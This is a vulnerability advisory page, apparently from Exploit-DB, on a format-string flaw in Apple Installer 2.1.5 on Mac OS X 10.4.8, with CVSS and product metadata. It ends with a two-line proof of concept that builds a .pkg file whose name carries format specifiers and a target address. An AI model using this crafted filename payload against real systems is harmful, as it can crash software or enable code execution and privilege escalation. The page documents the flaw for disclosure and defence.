Apple Installer Format String Vulnerability

vendor:

Apple Installer

by:

Unknown

7.5

CVSS

HIGH

Format String Vulnerability

Unknown

CWE

Product Name: Apple Installer

Affected Version From: Apple Installer Version 2.1.5

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:apple:installer:2.1.5

Metasploit:

Other Scripts:

Platforms Tested: Mac OS X 10.4.8

Unknown

Apple Installer Format String Vulnerability

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22272/info

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Apple Installer Version 2.1.5 on Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. 

$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg